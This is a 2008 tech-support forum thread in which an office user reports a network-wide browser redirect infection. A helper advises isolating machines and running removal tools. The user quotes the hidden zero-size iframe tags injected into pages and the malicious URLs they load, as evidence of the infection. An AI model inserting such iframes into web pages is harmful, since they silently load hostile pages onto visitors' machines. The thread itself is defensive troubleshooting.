Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Always Get Redirected To Http://kiddy.online.sh.cn/upimages/test/index.htm


  • Please log in to reply
4 replies to this topic

#1 EESP

EESP

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:06:52 AM

Posted 15 April 2008 - 09:07 AM

Hi All,

It's the first time I post here, feel happy to join this site.

It seems all computers through our network are infected by an unknown trojan or malware.

Two weeks ago, when we opened some sites on the web then we got a blank page and was
redirected to the following site.
"http://kiddy.online.sh.cn/upimages/test/index.htm"

It seems my browser is hijacked. Isn't it ?
The next tag is inserted at the top first line of the redirected html page.
<iframe src='http://kiddy.online.sh.cn/upimages/test/index.htm' width=0 height=0</iframe>

I was unable to remove the browser hijacker till now.
Either latest version of Avast , Nod32, Lavasoft Ad-aware , SpyBot SD or Malwarebytes' Anti-Malware cannot find or remove it.
Either I use Firefox or IE I get the same result.

Today I just see that html page are redrected to "http://www.sxblgg.com/inc/he1p.htm".
The next tag is inserted at the top first line of the redirected html page.
<iframe src='http://www.sxblgg.com/inc/he1p.htm' width=1 height=1</iframe>
It seems "http://www.sxblgg.com/inc/he1p.htm" contains javascript program.So first thing I did was to disable any javascript downlooad.

I am not sure but I've heard some Mac machines have been also infected.

Kindly please advice how to remove this...

Thanks in advance and Regards.

Info about my computer:
-running OS Windows XP
-Browser Mozilla Firefox / IE
-Nod32 Anti-virus.
-Ad-aware
-Spybot Search and destroy
-Malwarebytes' Anti-Malware

BC AdBot (Login to Remove)

 


#2 DaChew

DaChew

    Visiting Alien


  • Members
  • 10,317 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:millenium falcon and rockytop
  • Local time:07:52 AM

Posted 15 April 2008 - 09:38 AM

It seems all computers through our network are infected


do you know how to clean a network?

who's the system administrator?
Chewy

No. Try not. Do... or do not. There is no try.

#3 EESP

EESP
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:06:52 AM

Posted 15 April 2008 - 09:58 AM

Hi,
Thks for replying soon,

do you know how to clean a network?

No I don't

who's the system administrator?

Just a co-worker, we've been trying to get rid from it now.

#4 DaChew

DaChew

    Visiting Alien


  • Members
  • 10,317 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:millenium falcon and rockytop
  • Local time:07:52 AM

Posted 15 April 2008 - 10:27 AM

I have only done one myself, first isolate one machine and disinfect it, once you have the removal procedure down you can do all the others, the key is to have them disconnected from the network.

A large company I know operating a regional call center reimaged over 100 machines overnight to get back on line.

http://www.bleepingcomputer.com/forums/ind...st&p=797504

your test machine would follow this procedure, as soon as the downloads are finished, disconnect from the network and shut down any resident protection and start the scans and fixes

save the logs and post back, use a floppy

the important thing to remember is if you reconnect a clean computer to the network and there's still one infected connected, you are back starting all over again

you can download the updates later manually if you need to pull all the infected machine off the network
Chewy

No. Try not. Do... or do not. There is no try.

#5 DaChew

DaChew

    Visiting Alien


  • Members
  • 10,317 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:millenium falcon and rockytop
  • Local time:07:52 AM

Posted 15 April 2008 - 10:47 AM

another tool to use is

http://www.bleepingcomputer.com/forums/ind...st&p=797472

If you execute this on a clean computer, it will disinfect and immunize a usb flash drive, in case your infection can spread that way also

Ignore the sdfix part till later, it's a very useful tool if needed

Edited by DaChew, 15 April 2008 - 11:49 AM.

Chewy

No. Try not. Do... or do not. There is no try.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users